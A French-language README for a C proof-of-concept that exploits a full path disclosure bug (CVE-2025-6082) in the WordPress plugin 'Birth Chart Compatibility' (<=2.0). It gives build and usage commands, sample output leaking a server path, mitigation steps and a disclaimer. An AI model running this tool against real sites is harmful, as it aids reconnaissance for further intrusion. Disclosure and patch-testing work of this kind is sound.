
Preuve de concept exploitant le bug de divulgation de chemin complet dans le plugin WordPress « Birth Chart Compatibility » (<=v2.0)
Auteur: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Vulnérabilité: Divulgation de chemin complet (CWE-200)
Cette preuve de concept exploite un bug de divulgation de chemin complet dans le plugin WordPress Birth Chart Compatibility (versions ≤ 2.0). Le POC envoie une requête HTTP GET au point de terminaison index.php du plugin, capture toute alerte PHP ou erreur fatale, et extrait le chemin du système de fichiers du serveur (par ex. /var/www/html/wp-content/plugins/... ou C:\xampp\htdocs\...).
Révéler le chemin complet aide un attaquant à enchaîner d'autres attaques d'inclusion de fichier local (LFI), d'exécution de code à distance (RCE) ou de reconnaissance.
gcc ou un compilateur C compatiblelibcurlargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [options]
Options :
-u, --url (Obligatoire) URL de base du site WordPress cible
-c, --cookies Utiliser les cookies du fichier (facultatif)
-v, --verbose Activer la sortie détaillée de curl
-f, --boucle Répéter la requête N fois (ex. -f 10)
-h, --help Afficher ce message d'aide
Exemple :
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5 Exemple de sortie :
[+] Requête envoyée avec succès
[+] URL d'entrée : https://victim.com
[+] URL complète formatée : https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] Code HTTP : 200
====================================[Réponse]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] Longueur de la réponse : 256
[+] Mot-clé trouvé : Warning:
[+] Contexte : Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
Mettez à jour le plugin « Birth Chart Compatibility » vers une version corrigée (> 2.0) dès qu'elle est publiée.
Désactivez ou supprimez le plugin si vous ne l'utilisez pas.
Refusez l'accès direct aux fichiers PHP du plugin (index.php) via la configuration de votre serveur web (par ex. via des règles .htaccess ou Nginx).
Avertissement Ce code est fourni à des fins éducatives et de test uniquement. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester peut être illégale.